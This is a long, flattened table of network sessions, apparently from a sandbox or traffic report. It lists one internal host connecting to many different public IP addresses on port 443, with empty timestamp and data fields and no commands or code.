                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12283192.168.2.2352952101.254.96.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12284192.168.2.2337702138.76.94.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12285192.168.2.2341506141.136.91.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12286192.168.2.2333358122.18.213.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12287192.168.2.2348296163.13.234.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12288192.168.2.2333312189.84.139.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12289192.168.2.2338264149.175.73.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12290192.168.2.2335254109.151.102.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12291192.168.2.233666691.28.85.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12292192.168.2.2345816218.147.55.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12293192.168.2.234387254.205.90.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12294192.168.2.234069259.135.117.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12295192.168.2.2354208152.141.56.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12296192.168.2.2345778202.10.43.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12297192.168.2.2339430201.122.15.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12298192.168.2.234421463.119.91.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12299192.168.2.235472264.247.250.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12300192.168.2.2347984153.210.197.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12301192.168.2.233531292.68.144.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12302192.168.2.2360072142.59.193.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12303192.168.2.2350616204.92.77.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12304192.168.2.2360372206.22.37.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12305192.168.2.234232652.106.66.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12306192.168.2.233586262.189.242.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12307192.168.2.2357756106.107.113.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12308192.168.2.233471664.19.114.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12309192.168.2.2346636125.173.200.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12310192.168.2.234854832.119.197.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12311192.168.2.235503482.34.124.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12312192.168.2.234348440.95.156.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12313192.168.2.2342616112.197.1.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12314192.168.2.234094890.95.238.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12315192.168.2.2333338191.42.8.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12316192.168.2.2359936164.232.149.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12317192.168.2.235999648.123.72.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12318192.168.2.234216084.197.43.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12319192.168.2.2339968220.155.75.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12320192.168.2.234016891.215.187.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12321192.168.2.234409443.225.0.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12322192.168.2.2360820103.31.207.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12323192.168.2.235125045.74.5.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12324192.168.2.2353312107.218.48.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12325192.168.2.2341788206.9.209.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12326192.168.2.2357214145.8.255.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12327192.168.2.235116251.143.31.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12328192.168.2.2336496200.239.45.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12329192.168.2.233315488.169.239.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12330192.168.2.234061458.70.28.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12331192.168.2.2340110200.8.122.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12332192.168.2.2333176203.29.52.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12333192.168.2.234016627.40.208.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12334192.168.2.235021490.207.114.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12335192.168.2.2333496194.159.112.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12336192.168.2.235106853.249.46.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12337192.168.2.235660849.191.133.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12338192.168.2.2343986201.16.30.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12339192.168.2.234395848.156.112.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12340192.168.2.2333346185.57.153.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12341192.168.2.2358754190.96.218.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12342192.168.2.233596653.176.218.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12343192.168.2.2334722103.240.212.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12344192.168.2.2359132203.13.31.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12345192.168.2.235254053.119.80.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12346192.168.2.2344712192.205.58.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12347192.168.2.2358234125.163.173.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12348192.168.2.234710457.80.179.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12349192.168.2.234346872.47.91.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12350192.168.2.2359948108.230.143.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12351192.168.2.2340154151.152.12.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12352192.168.2.2358924204.90.97.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12353192.168.2.235893624.202.14.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12354192.168.2.235161294.236.155.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12355192.168.2.233283235.181.204.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12356192.168.2.234823618.26.112.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12357192.168.2.2335046202.22.0.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12358192.168.2.2334490155.148.153.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12359192.168.2.233875024.8.199.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12360192.168.2.234680693.28.76.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12361192.168.2.234353680.119.249.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12362192.168.2.235942092.96.157.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12363192.168.2.2355894216.220.123.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12364192.168.2.2351806204.53.155.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12365192.168.2.2348202117.152.234.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12366192.168.2.234159677.65.129.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12367192.168.2.2334918130.233.150.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12368192.168.2.2359154138.47.200.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12369192.168.2.2342004192.223.51.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12370192.168.2.2356766210.129.66.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12371192.168.2.234401237.25.109.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12372192.168.2.2334168142.183.21.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12373192.168.2.2349532145.199.209.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12374192.168.2.2353406183.63.80.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12375192.168.2.2358092109.140.132.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12376192.168.2.2350594147.139.232.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12377192.168.2.2347934120.195.252.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12378192.168.2.235069619.88.8.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12379192.168.2.236006672.185.101.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12380192.168.2.2342518223.138.24.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12381192.168.2.2343104120.166.229.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12382192.168.2.2360508134.58.87.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12383192.168.2.2340472155.196.166.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12384192.168.2.2350862221.165.177.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12385192.168.2.2340720167.13.221.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12386192.168.2.235222275.115.93.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12387192.168.2.2348264190.226.180.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12388192.168.2.233695863.71.83.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12389192.168.2.2336050123.7.92.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12390192.168.2.234784651.185.164.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12391192.168.2.2346680108.219.61.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12392192.168.2.235336869.210.65.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12393192.168.2.234195259.35.194.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12394192.168.2.2352970148.8.245.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12395192.168.2.2351226131.24.135.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12396192.168.2.2342950213.184.0.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12397192.168.2.235029231.227.98.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12398192.168.2.234653618.218.30.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12399192.168.2.2343298121.168.244.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12400192.168.2.2336254146.226.234.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12401192.168.2.2358072184.59.192.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12402192.168.2.2342754137.241.80.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12403192.168.2.235233232.126.128.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12404192.168.2.2335276183.120.28.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12405192.168.2.234785466.239.144.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12406192.168.2.233542273.26.70.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12407192.168.2.2359592161.52.31.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12408192.168.2.235897418.47.97.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12409192.168.2.234886836.224.181.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12410192.168.2.234986018.217.70.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12411192.168.2.2340418177.91.116.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12412192.168.2.2360386208.80.89.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12413192.168.2.2333328184.45.62.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12414192.168.2.2339804123.134.136.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12415192.168.2.235182231.31.214.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12416192.168.2.2341132132.22.103.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12417192.168.2.2338966206.154.175.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12418192.168.2.233445860.150.251.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12419192.168.2.235212478.93.5.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12420192.168.2.2350152182.104.129.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12421192.168.2.2344938193.189.146.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12422192.168.2.234634864.122.81.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12423192.168.2.2333352169.130.134.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12424192.168.2.2348142180.194.237.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12425192.168.2.234457858.68.81.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12426192.168.2.235642499.254.250.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12427192.168.2.2347150209.212.117.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12428192.168.2.235502847.239.239.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12429192.168.2.2360972164.140.125.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12430192.168.2.2340712221.70.157.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12431192.168.2.2343648192.34.37.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12432192.168.2.2342880195.120.247.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12433192.168.2.234075017.119.228.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12434192.168.2.2349142133.239.241.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12435192.168.2.2342942135.163.191.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12436192.168.2.2342744138.126.87.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12437192.168.2.234659662.153.72.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12438192.168.2.233338240.132.207.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12439192.168.2.234450867.135.114.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12440192.168.2.2345308213.42.150.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12441192.168.2.2332922156.141.131.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12442192.168.2.23367201.29.96.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12443192.168.2.2353230212.226.122.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12444192.168.2.234167449.99.232.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12445192.168.2.233397273.247.227.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12446192.168.2.2338534134.148.30.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12447192.168.2.2349080163.24.245.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12448192.168.2.233340614.243.116.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12449192.168.2.2360802155.242.85.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12450192.168.2.2335484198.65.175.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12451192.168.2.236010678.94.9.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12452192.168.2.2341678196.206.122.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12453192.168.2.233737484.58.71.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12454192.168.2.235767249.98.64.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12455192.168.2.23480729.86.103.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12456192.168.2.233407665.250.165.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12457192.168.2.2349972209.101.141.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12458192.168.2.235332874.49.51.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12459192.168.2.2339794176.130.181.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12460192.168.2.235193068.68.183.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12461192.168.2.233649889.132.237.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12462192.168.2.2353618186.41.52.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12463192.168.2.234111479.22.14.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12464192.168.2.235045031.188.2.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12465192.168.2.2348386204.206.207.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12466192.168.2.2358930165.40.11.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12467192.168.2.2347658168.60.169.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12468192.168.2.234785464.211.148.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12469192.168.2.2358804112.200.146.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12470192.168.2.235561491.202.164.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12471192.168.2.23371185.149.81.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12472192.168.2.2334426151.143.22.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12473192.168.2.2335368196.33.89.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12474192.168.2.235808472.235.3.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12475192.168.2.2352746190.178.132.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12476192.168.2.235031813.172.73.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12477192.168.2.235825040.169.71.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12478192.168.2.234114841.243.89.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12479192.168.2.2335764140.135.24.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12480192.168.2.235070264.53.16.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12481192.168.2.2349878161.48.124.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12482192.168.2.2341686177.191.167.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12483192.168.2.234564443.4.132.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12484192.168.2.233410499.50.51.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12485192.168.2.234432291.52.190.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12486192.168.2.2336286119.7.75.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12487192.168.2.234026490.90.185.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12488192.168.2.2351396110.51.44.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12489192.168.2.2334398130.245.71.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12490192.168.2.2336862189.123.41.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12491192.168.2.2351140177.10.16.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12492192.168.2.233600041.76.225.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12493192.168.2.2336634166.246.118.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12494192.168.2.235238863.162.207.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12495192.168.2.2359868208.77.18.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12496192.168.2.2342122110.52.122.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12497192.168.2.235570220.178.138.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12498192.168.2.233741897.230.169.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12499192.168.2.2348916190.74.97.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12500192.168.2.233973648.156.164.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12501192.168.2.235665288.64.232.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12502192.168.2.2338032114.255.224.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12503192.168.2.2335446206.72.91.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12504192.168.2.2333572164.63.61.211443
                                        TimestampBytes transferredDirectionData


